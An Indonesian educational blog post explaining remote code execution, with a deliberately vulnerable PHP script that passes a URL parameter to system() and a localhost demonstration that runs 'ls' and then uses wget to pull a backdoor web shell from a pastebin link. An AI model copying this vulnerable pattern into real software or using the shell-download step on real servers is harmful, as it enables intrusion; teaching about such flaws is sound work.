Edukeun - Edukasi Pelajar Indonesia

Pahami eksekusi kode jarak jauh dan cara kerjanya

Remote Code Execution


Edukeun Mungkin Sobat Edu belum tahu lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silakan simak ya ada di bawah jawabannya.

Apa itu eksekusi kode jarak jauh?

Eksekusi kode jarak jauh adalah sebuah kerentanan Penyerang dapat menggunakan kerentanan tersebut untuk menjalankan perintah pada komputer target, biasanya memanfaatkan kelemahan aplikasi (yaitu, target yang dieksploitasi), sehingga penyerang dapat menjalankan perintah2 dari jarak jauh melalui URL. Kesalahan ini biasanya ditemukan pada aplikasi yang menggunakan CGI.

Bagaimana Remote Code Execution itu bekerja?

Script PHP Remote Code Execution sederhana :
<?php echo "RemoteCodeExecution | www.edukeun.xyz<br><br><br>";
$cmd=$_GET['action']; echo "Command : " . $cmd . "<br><br>";
system($cmd); ?>

Skrip di atas adalah contoh skrip yang rentan dalam PHP. Seberapa sederhanakah pengaturan skrip "eksekusi kode jarak jauh"? Ya, masalahnya memang ada di sistem ($ command), yang akan menjalankan fungsi terkait sistem.

Di sini, saya telah mengunggah skrip eksekusi kode jarak jauh ke localhost dengan nama tools.php. Sebagai contoh target, saya akan mempraktikkan bagaimana penyerang dapat melakukan eksekusi kode jarak jauh pada sistem. Saya membuka link http://localhost:8888/tools.php ( contoh target )




Apakah saya menambahkannya? action = mengeksekusi eksekusi kode jarak jauh setelah http: // localhost: 8888 / tools.php, jadi tautan berikut adalah http: // localhost: 8888 / tools.php? action =, saya mencoba menjalankan perintah ls untuk melihat isi direktori http: // // Host lokal: 8888 / tools.php? action = ls, ada 1 folder dan 3 file.

Kemudian, penyerang mencoba menggunakan perintah wget untuk memanggil Shell Backdoor RESET, seperti perintah berikut `` wget linkshell -O filename.php '', http: // localhost: 8888 / tools.php? Action = wget https://pastebin.com/raw/ **** -O reset.php Lalu Sobat Edu cek shellnya, http: // localhost: 8888 / reset.php

Sekarang shell telah diupload :)

Sebelumnya, semoga artikel ini bermanfaat untuk sobat edu, jika ada kesalahan dalam menulis artikel ini mohon dimaklumi, karena saya masih belajar sebagai penulis.

Related Posts
SHARE

Related Posts

Posting Komentar